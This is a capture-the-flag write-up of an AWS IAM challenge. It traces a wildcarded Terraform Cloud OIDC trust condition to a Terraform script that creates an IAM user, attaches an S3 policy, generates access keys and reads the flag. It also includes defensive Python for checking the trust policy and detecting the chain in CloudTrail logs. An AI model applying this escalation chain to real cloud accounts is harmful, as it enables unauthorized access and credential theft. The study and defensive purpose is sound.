
# Orion

<figure><img src="/files/pXsJaai5LGZMFJYFjqiE" alt=""><figcaption></figcaption></figure>

For this challenge, we are given a tfstate file. A tfstate file is Terraform's state file, which records the infrastructure Terraform has deployed as code.

There is a policy document `s3_access`.

<figure><img src="/files/p6j6UrzlThsbgbDhvAE7" alt=""><figcaption></figcaption></figure>

```json
{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Action": "s3:ListBucket",
            "Resource": "arn:aws:s3:::dc-33-cv-tf-ctf-bucket-cxc0p38y"
        },
        {
            "Effect": "Allow",
            "Action": "s3:GetObject",
            "Resource": "arn:aws:s3:::dc-33-cv-tf-ctf-bucket-cxc0p38y/flag.txt"
        }
    ]
}
```

The policy allows any user or role it is attached to to retrieve the flag. Let's see which principal the policy is attached to. Scrolling further down, we aren't able to find who the `s3_access` policy is attached to, but we do find another IAM policy document.

<figure><img src="/files/ipL63pHg6EuXLnwmcimm" alt=""><figcaption></figcaption></figure>

```json
{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Action": [
                "iam:ListUserPolicies",
                "iam:ListAttachedUserPolicies",
                "iam:GetUser",
                "iam:CreateUser"
            ],
            "Resource": "arn:aws:iam::691903504411:user/terraform-dc33-*"
        },
        {
            "Effect": "Allow",
            "Action": [
                "iam:ListAccessKeys",
                "iam:CreateAccessKey"
            ],
            "Resource": "arn:aws:iam::691903504411:user/terraform-dc33-*"
        },
        {
            "Effect": "Allow",
            "Action": "iam:AttachUserPolicy",
            "Resource": "arn:aws:iam::691903504411:user/terraform-dc33-*",
            "Condition": {
                "ArnEquals": {
                    "iam:PolicyArn": "arn:aws:iam::691903504411:policy/S3BucketAccessPolicy"
                }
            }
        }
    ]
}
```

The `terraform_user_management` policy allows the principal it is attached to to create users whose names start with `terraform-dc33-`, create access keys for them, and attach `S3BucketAccessPolicy` (and only that policy, per the `ArnEquals` condition) to them.

We can also see there is a `terraform_oidc` IAM role.

<figure><img src="/files/fJO2k3wmY02iuvEPFNfE" alt=""><figcaption></figcaption></figure>

Looking at the assume role policy, what should immediately stand out is the wildcard in the condition. It allows a run from any Terraform Cloud organization whose name starts with `cloud-village-`, as long as the workspace is named `dc-33-cv-tf`, to assume the role, and organization names in Terraform Cloud are chosen by whoever registers them.

```json
{
    "Statement": [
        {
            "Action": "sts:AssumeRoleWithWebIdentity",
            "Condition": {
                "StringEquals": {
                    "app.terraform.io:aud": "aws.workload.identity"
                },
                "StringLike": {
                    "app.terraform.io:sub": "organization:cloud-village-*:workspace:dc-33-cv-tf:*"
                }
            },
            "Effect": "Allow",
            "Principal": {
                "Federated": "arn:aws:iam::691903504411:oidc-provider/app.terraform.io"
            }
        }
    ],
    "Version": "2012-10-17"
}
```
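To make the wildcard concrete, here is an added example (not from the writeup) that evaluates the trust policy's `Condition` block against constructed Terraform Cloud token claims, with the published condition beside a pinned one. `cloud-village-dc33` is an assumed name for the legitimate organization, and the claim layout is a constructed subset of the real token.

```python
import re

def string_like(pattern: str, value: str) -> bool:
    """IAM StringLike: '*' matches any run of characters, '?' exactly one, all else literal."""
    regex = "".join(".*" if c == "*" else "." if c == "?" else re.escape(c) for c in pattern)
    return re.fullmatch(regex, value) is not None

def condition_allows(condition: dict, claims: dict) -> bool:
    """Evaluate a trust-policy Condition block (StringEquals/StringLike only) against token
    claims. Every condition key must be satisfied; a missing claim fails closed."""
    for operator, tests in condition.items():
        if operator not in ("StringEquals", "StringLike"):
            raise ValueError(f"operator {operator} is not modelled here")
        for key, pattern in tests.items():
            value = claims.get(key)
            if value is None:
                return False
            matched = value == pattern if operator == "StringEquals" else string_like(pattern, value)
            if not matched:
                return False
    return True

AUD = {"app.terraform.io:aud": "aws.workload.identity"}
# Condition as published in the challenge's trust policy: the organization segment is wildcarded.
WEAK = {"StringEquals": AUD,
        "StringLike": {"app.terraform.io:sub": "organization:cloud-village-*:workspace:dc-33-cv-tf:*"}}
# Hardened variant: pin the organization to the one that owns the workspace ("cloud-village-dc33"
# is an assumed name; the only wildcard left is the run phase at the end of the sub claim).
STRICT = {"StringEquals": AUD,
          "StringLike": {"app.terraform.io:sub": "organization:cloud-village-dc33:workspace:dc-33-cv-tf:*"}}

def claims_for(org: str, workspace: str = "dc-33-cv-tf") -> dict:
    """Constructed subset of the claims in a Terraform Cloud workload identity token."""
    return {"app.terraform.io:aud": "aws.workload.identity",
            "app.terraform.io:sub": f"organization:{org}:workspace:{workspace}:run_phase:apply"}

if __name__ == "__main__":
    for org in ("cloud-village-dc33", "cloud-village-dietrying"):
        print(f"{org}: weak={condition_allows(WEAK, claims_for(org))} "
              f"strict={condition_allows(STRICT, claims_for(org))}")
```

Running it shows the published condition accepting both organizations while the pinned one accepts only the assumed legitimate one.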

We can also see that the `TerraformDC33UserManagement` IAM policy is attached to the `TerraformCloudDC33Role` role.

<figure><img src="/files/YdzUQTI245vIZ0uy22bM" alt=""><figcaption></figcaption></figure>

With that, we have the full exploit chain:

* Assume the role `arn:aws:iam::691903504411:role/TerraformCloudDC33Role` through the Terraform Cloud OIDC trust.
* Create a user whose name matches `terraform-dc33-*`.
* Attach `S3BucketAccessPolicy` to that user.
* Create an access key for the user.
* Get the flag from `arn:aws:s3:::dc-33-cv-tf-ctf-bucket-cxc0p38y/flag.txt`.
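From the defender's side, the same chain leaves a recognisable sequence in CloudTrail. This added example (not part of the writeup) walks constructed, simplified CloudTrail records and flags a `TerraformCloudDC33Role` session that was opened from an organization other than the expected one and then ran `CreateUser`, `AttachUserPolicy` and `CreateAccessKey`; the record layout, `cloud-village-dc33` as the expected organization and the session name are assumptions.

```python
import json

EXPECTED_ORG = "cloud-village-dc33"  # assumed name of the organization that legitimately owns the workspace
ROLE_ARN = "arn:aws:iam::691903504411:role/TerraformCloudDC33Role"
SESSION = "arn:aws:sts::691903504411:assumed-role/TerraformCloudDC33Role/run-abc"  # constructed session
CHAIN = ("CreateUser", "AttachUserPolicy", "CreateAccessKey")

def iam_event(name: str, **params) -> dict:
    """Constructed, simplified CloudTrail record for an IAM call made with the role session."""
    return {"eventName": name, "eventSource": "iam.amazonaws.com",
            "userIdentity": {"type": "AssumedRole", "arn": SESSION}, "requestParameters": params}

# Constructed log: the chain as it would look when a foreign Terraform Cloud org assumes the role.
SAMPLE_LOG = "\n".join(json.dumps(r) for r in [
    {"eventName": "AssumeRoleWithWebIdentity", "eventSource": "sts.amazonaws.com",
     "userIdentity": {"type": "WebIdentityUser", "identityProvider": "app.terraform.io",
                      "userName": "organization:cloud-village-dietrying:workspace:dc-33-cv-tf:run_phase:apply"},
     "requestParameters": {"roleArn": ROLE_ARN},
     "responseElements": {"assumedRoleUser": {"arn": SESSION}}},
    iam_event("CreateUser", userName="terraform-dc33-kabinet"),
    iam_event("AttachUserPolicy", userName="terraform-dc33-kabinet",
              policyArn="arn:aws:iam::691903504411:policy/S3BucketAccessPolicy"),
    iam_event("CreateAccessKey", userName="terraform-dc33-kabinet"),
])

def org_from_sub(sub: str) -> str:
    """Pull the organization name out of a Terraform Cloud 'sub' claim."""
    parts = sub.split(":")
    return parts[parts.index("organization") + 1] if "organization" in parts else ""

def find_suspicious_sessions(log_text: str) -> list:
    """Flag role sessions opened from an unexpected TFC organization, or that ran the IAM chain."""
    sessions, findings = {}, []
    for line in log_text.splitlines():
        ev = json.loads(line)
        ident = ev["userIdentity"]
        if ev["eventName"] == "AssumeRoleWithWebIdentity" and ident.get("identityProvider") == "app.terraform.io":
            arn = ev["responseElements"]["assumedRoleUser"]["arn"]
            sessions[arn] = {"org": org_from_sub(ident["userName"]), "actions": []}
        elif ident.get("type") == "AssumedRole" and ident.get("arn") in sessions:
            sessions[ident["arn"]]["actions"].append(ev["eventName"])
    for arn, s in sessions.items():
        foreign, ran_chain = s["org"] != EXPECTED_ORG, all(step in s["actions"] for step in CHAIN)
        if foreign or ran_chain:
            findings.append({"session": arn, "org": s["org"], "foreign_org": foreign, "iam_chain": ran_chain})
    return findings

if __name__ == "__main__":
    print(json.dumps(find_suspicious_sessions(SAMPLE_LOG), indent=2))
```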

***

First, let's create a Terraform Cloud organization and workspace whose names satisfy the trust policy's condition.

<figure><img src="/files/oN5RqzxCUDG4JpyWcucx" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/vl2Iayqr30W3JYj1CLJy" alt=""><figcaption></figcaption></figure>

Next, I will be creating a Terraform script to automate the exploit chain.

```hcl
terraform {
  required_providers {
    aws = {
      source  = "hashicorp/aws"
      version = "~> 4.49.0"
    }
  }
  cloud {
    organization = "cloud-village-dietrying"
    workspaces {
      name = "dc-33-cv-tf"
    }
  }
}


provider "aws" {
  region = "us-west-2"
}

resource "aws_iam_user" "terraform_user" {
  name = "terraform-dc33-kabinet"
  path = "/"
}

# Attach the existing policy to the user
resource "aws_iam_user_policy_attachment" "s3_policy_attachment" {
  user       = aws_iam_user.terraform_user.name
  policy_arn = "arn:aws:iam::691903504411:policy/S3BucketAccessPolicy"
}

# Create access key for the user
resource "aws_iam_access_key" "terraform_user_key" {
  user = aws_iam_user.terraform_user.name
}

# Output the access key details
output "access_key_id" {
  value = aws_iam_access_key.terraform_user_key.id
  description = "Access Key ID for terraform-dc33-kabinet user"
}

output "secret_access_key" {
  value = aws_iam_access_key.terraform_user_key.secret
  sensitive = true
  description = "Secret Access Key for terraform-dc33-kabinet user (sensitive)"
}

output "user_arn" {
  value = aws_iam_user.terraform_user.arn
  description = "ARN of the created user"
}

output "user_name" {
  value = aws_iam_user.terraform_user.name
  description = "Name of the created user"
}
```

We first need to authenticate to Terraform Cloud. Running `terraform apply`, we get the access key ID and secret access key from the outputs.

<figure><img src="/files/QrSQv4yEYPMNEkNRlEcI" alt=""><figcaption></figcaption></figure>

Then, using that access key and secret access key, we retrieve the flag.

<figure><img src="/files/q5LS0bBfnTJz9mdp2yqM" alt=""><figcaption></figcaption></figure>

***

Reference

[https://developer.hashicorp.com/terraform/tutorials/cloud/dynamic-credentials](https://developer.hashicorp.com/terraform/tutorials/cloud/dynamic-credentials)

[https://github.com/hashicorp-education/learn-terraform-dynamic-credentials/tree/main/aws/trust](https://github.com/hashicorp-education/learn-terraform-dynamic-credentials/tree/main/aws/trust)

